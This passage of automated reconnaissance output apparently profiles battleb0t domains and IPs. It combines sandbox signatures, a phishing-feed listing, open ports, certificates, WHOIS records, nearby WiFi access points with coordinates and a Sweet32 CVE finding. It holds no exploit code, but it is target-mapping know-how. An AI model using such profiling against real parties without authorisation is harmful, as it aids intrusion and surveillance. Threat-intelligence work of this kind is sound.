(Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "rundll32.exe" touched "Enhanced Storage Icon Overlay Handler Class" (Path: "HKCU\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 1 (GFS Unread Stub)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{99FD978C-D287-4F50-827F-B2C658EDA8E7}\\INPROCSERVER32")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"ThemeApiConnectionRequest" (Indicator: "ThemeApiConnectionRequest") in Source: 00000000-00003484-0000003B-36197385'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is 
"data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\SmartScreen_ClientId_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\CommunicationManager_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\LRIEElevationPolicyMutex"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2440"\n "IsoScope_988_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "_SHuassist.mtx"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_988_IESQMMUTEX_0_331"\n "Local\\LRIEElevationPolicyMutex"\n "IsoScope_988_IESQMMUTEX_0_303"\n "CommunicationManager_Mutex"\n "IsoScope_988_IE_EarlyTabStart_0xe74_Mutex"\n "Local\\ZonesCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." 
(UID: 00000000-00003484)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00003484)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"~DF645655DB470F49DD.TMP" has type "data"- Location: [%TEMP%\\~DF645655DB470F49DD.TMP]- [targetUID: 00000000-00002440]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002440]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00002996]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002996]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002996]\n "HiJO1-18.srt.kcpvle5.partial" has type "UTF-8 Unicode text"- Location: [%USERPROFILE%\\Downloads\\HiJO1-18.srt.kcpvle5.partial]- [targetUID: 00000000-00002996]\n "~DFD6CAA9D81E87A12A.TMP" has type "data"- Location: [%TEMP%\\~DFD6CAA9D81E87A12A.TMP]- [targetUID: 00000000-00002440]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00002996]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002440]\n "L2R4NE1M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L2R4NE1M.txt]- [targetUID: 00000000-00002996]\n "8864D121A6EBD5E6D0EFEDAB49B51A90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\8864D121A6EBD5E6D0EFEDAB49B51A90]- [targetUID: 00000000-00002996]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002440]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00002996]\n "OJK4RYGG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OJK4RYGG.txt]- [targetUID: 00000000-00002440]\n "B126BF247C927A243E186240F06A7849" has type "data"- 
Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B126BF247C927A243E186240F06A7849]- [targetUID: 00000000-00002996]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-55', u'name': u'Touches files in the Windows directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 6, u'description': u'"rundll32.exe" touched file "%WINDIR%\\AppPatch\\sysmain.sdb"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-16', u'name': u'Connects to LPC ports', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rundll32.exe" connecting to "\\ThemeApiPort"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-78', u'name': u'Contains ability to read software policies', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1082', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-312', u'attck_id': u'T1082', u'relevance': 1, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS"; Key: "TRANSPARENTENABLED")'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-13', u'name': u'Reads the windows installation date', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION"; Key: "INSTALLDATE")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /static/srt/HiJO1-18.srt HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: archiveforjam.netlify.app\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_35.229.48.116]\n\n "1daf\n\\Xr`Um|?~T@+NI,og\n43\'LCeI\\7u?F | 35.229.48.116 |
| 2023-05-12 02:56:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://rhombussystems.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rhombussystems.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rhombussystems.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rhombussystems.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"75.2.60.5:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_81c_IESQMMUTEX_0_331"\n "IsoScope_81c_IE_EarlyTabStart_0x9a4_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_81c_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2076"\n "IsoScope_81c_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_81c_ConnHashTable<2076>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_81c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2076"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2C3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2D3.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab40.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "2NV4DI3M.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2NV4DI3M.txt]- [targetUID: 00000000-00002076]\n Dropped file: "7Q4BSDMY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7Q4BSDMY.txt]- [targetUID: 00000000-00003788]\n Dropped file: "AEL973TY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AEL973TY.txt]- [targetUID: 00000000-00002076]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsrhombussystems.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Tar2C3.tmp" has type "data"- Location: [%TEMP%\\Tar2C3.tmp]- [targetUID: 00000000-00003788]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: 
| 104.196.30.220 |
| 2023-05-12 03:12:58 | Malicious Affiliate | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [battleb0t.github.io]
https://www.openphish.com/feed.txt | battleb0t.github.io |
| 2023-05-12 02:54:15 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:11:18 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 52.3759, 4.8975 | 188.114.97.1 |
| 2023-05-12 02:53:32 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: E9B4:1F0F:9CADE8:E25A67:645D08C5
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100040-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683818693.056035,VS0,VE27
Vary: Accept-Encoding
X-Fastly-Request-ID: 695e2aec93a90cc9e1a6417b158a1f1d94a5129d
| 185.199.111.153 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.52): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:8080 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomAABCE4 (Net ID: 00:0C:F6:AA:BC:E4) | 50.8897, 6.0563 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | medyczka.pl (Category: health)
http://medyczka.pl/user/login | login |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WestEd (Net ID: 00:02:2D:05:7E:93) | 37.780462,-122.390564 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:53:F6:5F) | 40.2024, 29.0398 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | nginx | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:22 GMT", "content-type": "text/html"} |
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 23 22:31:46.387 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Jan 23 22:31:46.397 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: ecdsa-with-SHA384
|
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:8080 | 172.67.135.9 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9110 (Net ID: 00:14:C1:13:AB:45) | 40.2024, 29.0398 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | pics.battleb0t.xyz |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.70): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:52:24 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.108.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | KP51 (Net ID: 00:01:71:0A:07:87) | 52.3759, 4.8975 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:23) | 41.8781, -87.6298 |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 7.9 | 64.226.81.43 |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@resellercamp.com | Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-02-06T12:49:42.0Z
Creation Date: 2023-02-01T09:45:59.0Z
Registry Expiry Date: 2024-02-01T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.CPHOSTINGWORLD.NET
Name Server: NS2.CPHOSTINGWORLD.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:34.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-02-01T09:46:29Z
Creation Date: 2023-02-01T09:45:59Z
Registrar Registration Expiration Date: 2024-02-01T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Name Server: ns1.cphostingworld.net
Name Server: ns2.cphostingworld.net
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:34Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: RESELL CORE
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
|
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 0 | 0 | 4 | 0 | None | https://pbs.twimg.com/profile_images/1513617779546595336/ojFIrGXM_400x400.jpg | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.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.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg |
| 2023-05-12 02:54:17 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3037::6815:470e:80 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:8080 | 188.114.96.0/24 |
| 2023-05-12 03:12:12 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | 188.114.96.1 |
